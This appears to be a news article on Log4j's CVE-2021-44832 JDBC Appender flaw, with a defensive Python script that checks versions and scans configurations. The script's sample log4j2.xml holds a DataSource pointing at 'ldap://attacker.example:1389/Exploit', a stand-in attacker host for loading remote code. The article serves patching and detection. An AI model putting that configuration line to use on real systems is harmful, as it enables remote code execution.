A fifth vulnerability has surfaced in Log4j, the logging library that has been causing headaches for enterprises and IT teams since Log4Shell. With threat actors continually scanning for unpatched and vulnerable systems, Apache urges users to follow the update schedule and apply the new release immediately.
It affects almost all Log4j 2.x versions
The new flaw, tracked as CVE-2021-44832, affects Log4j 2.0-beta7 through 2.17.0, which is almost every 2.x release, including the 2.17.0 build that many teams only just deployed. The only 2.x versions not affected are the security-fix releases 2.3.2 and 2.12.4. Log4j 1.x is not affected by this particular CVE (although 1.x has been end-of-life since 2015 and should not be relied on either). Apache advises users to update to 2.3.2 for Java 6, 2.12.4 for Java 7, and 2.17.1 for Java 8 and later.
The bug was found by Yaniv Nizry, a security researcher at Checkmarx. It lives in the JDBC Appender: an attacker who can modify the logging configuration file can configure the appender with a DataSource whose JNDI name points at a remote URI (an LDAP URL, for instance), and Log4j resolves that name through JNDI when the configuration is loaded, leading to code execution. According to Nizry, the now-fixed flaw opens the door to arbitrary code execution rather than remote code execution, and he adds that its severity is lower than the original Log4Shell because it requires modifying the configuration instead of merely getting a string logged. Apache's advisory nevertheless describes it as an RCE with a Moderate severity (CVSS 6.6).
Apache acknowledged Nizry's report and developed and released the fix, Log4j 2.17.1, within a single day. The new version only allows the JDBC Appender's DataSource to use JNDI names in the java: protocol, and it requires the system property log4j2.enableJndiJdbc to be set to true before JNDI is used for the JDBC Appender at all.
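Two checks a practitioner would want to run after reading the version list and the description of the JDBC Appender vector above. This is an added example written for this page, not code from Apache or Checkmarx; the version range and fixed releases come from Apache's advisory, and the log4j2.xml fragment embedded below is constructed for the example, with the attacker host name being a placeholder. The first function classifies a Log4j 2 version string as affected or not, the second scans an XML configuration for a JDBC appender whose DataSource resolves a JNDI name outside the java: namespace, which is exactly the shape a malicious configuration for this CVE takes.

```python
"""Two checks for CVE-2021-44832 (Log4j 2.x JDBC Appender / JNDI).

1. is_affected(): is a given Log4j 2 version string inside the affected range?
2. find_unsafe_jdbc_jndi(): does a log4j2.xml configuration contain a JDBC
   appender whose DataSource resolves a non-"java:" JNDI name?
"""
import re
import xml.etree.ElementTree as ET
from typing import List, Tuple

# Release Apache recommends per Java line (Java 6 / Java 7 / Java 8 and later).
FIXED_BY_JAVA = {6: "2.3.2", 7: "2.12.4", 8: "2.17.1"}

# Affected range per Apache's advisory: 2.0-beta7 through 2.17.0, excluding
# the security-fix releases 2.3.2 and 2.12.4.
RANGE_LOW, RANGE_HIGH = "2.0-beta7", "2.17.0"
EXCLUDED = {"2.3.2", "2.12.4"}

_VER_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?$", re.I)
_STAGE = {"alpha": 0, "beta": 1, "rc": 2}
_FINAL = 3  # a final release sorts above every pre-release of the same number


def parse_version(v: str) -> Tuple[int, int, int, Tuple[int, int]]:
    """Turn '2.0-beta7' / '2.17.0' into a tuple that sorts like Log4j releases."""
    m = _VER_RE.match(v.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j version: {v!r}")
    major, minor, patch = int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)
    pre = (_STAGE[m.group(4).lower()], int(m.group(5))) if m.group(4) else (_FINAL, 0)
    return (major, minor, patch, pre)


def is_affected(v: str) -> bool:
    """True if this version carries CVE-2021-44832 (1.x is out of scope here)."""
    key = parse_version(v)
    if key[0] != 2 or v.strip() in EXCLUDED:
        return False
    return parse_version(RANGE_LOW) <= key <= parse_version(RANGE_HIGH)


def fixed_version_for_java(java_major: int) -> str:
    """Which release to upgrade to for a given Java major version."""
    if java_major < 6:
        raise ValueError("no fixed Log4j 2 release exists for Java older than 6")
    return FIXED_BY_JAVA[min(java_major, 8)]  # the Java 8 line covers newer JDKs


def find_unsafe_jdbc_jndi(config_xml: str) -> List[Tuple[str, str]]:
    """Return (appender name, jndiName) for every JDBC appender whose DataSource
    points at a JNDI name outside the 'java:' namespace. Before 2.17.1 such a
    name (ldap://, rmi://, ...) is resolved through JNDI when the config loads."""
    findings = []
    root = ET.fromstring(config_xml)
    for elem in root.iter():
        if elem.tag.lower() != "jdbc":  # Log4j plugin names are case-insensitive
            continue
        for child in elem:
            if child.tag.lower() != "datasource":
                continue
            jndi = child.get("jndiName", "")
            if not jndi.lower().startswith("java:"):
                findings.append((elem.get("name", "?"), jndi))
    return findings


# Constructed sample configuration: one appender points its DataSource at an
# LDAP URL (the CVE-2021-44832 pattern), the other at a normal container-bound
# data source. The host name is a placeholder, not a real server.
SAMPLE_CONFIG = """<Configuration status="WARN">
  <Appenders>
    <JDBC name="auditDb" tableName="audit_log">
      <DataSource jndiName="ldap://attacker.example:1389/Exploit"/>
      <Column name="message" pattern="%m"/>
    </JDBC>
    <JDBC name="appDb" tableName="app_log">
      <DataSource jndiName="java:comp/env/jdbc/LoggingDataSource"/>
      <Column name="message" pattern="%m"/>
    </JDBC>
  </Appenders>
  <Loggers>
    <Root level="info">
      <AppenderRef ref="appDb"/>
    </Root>
  </Loggers>
</Configuration>
"""

if __name__ == "__main__":
    for v in ("2.17.0", "2.17.1", "2.12.4", "2.3.1", "2.0-beta6"):
        print(f"{v:10} affected={is_affected(v)}")
    for name, jndi in find_unsafe_jdbc_jndi(SAMPLE_CONFIG):
        print(f"appender {name!r} resolves non-java: JNDI name {jndi!r}")
```

The configuration scan only covers XML configurations; Log4j 2 also accepts JSON, YAML and properties files, so treat a clean result as a partial check. The real remediation is still upgrading to the fixed release for your Java line and making sure the logging configuration file is only writable by the people and processes that should be able to change it.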
Checkmarx has published the full technical details of the new flaw in its write-up.
Related Stories
- Lacework introduces Lacework Cloud Care to fight against Log4j
- Datto released Log4j tool for MSPs
- VMware vCenter Server is targeted by hackers via Log4j flaws
- Two new vulnerabilities are found on Log4j, only one of them is fixed yet
- CISA published an emergency directive for Log4j
- Google joining the war against Log4j exploits
- Hackers exploit Log4j to inject Monero miners, shifting from LDAP to RMI
- A third, new Apache Log4j vulnerability is discovered
- How to scan your server to detect Log4j (Log4Shell) vulnerability
- The Log4j flaw is patched but it is still vulnerable
- CISA published Log4j vulnerability guidance
- Zero-day Apache Log4j RCE vulnerability (Log4Shell) is being exploited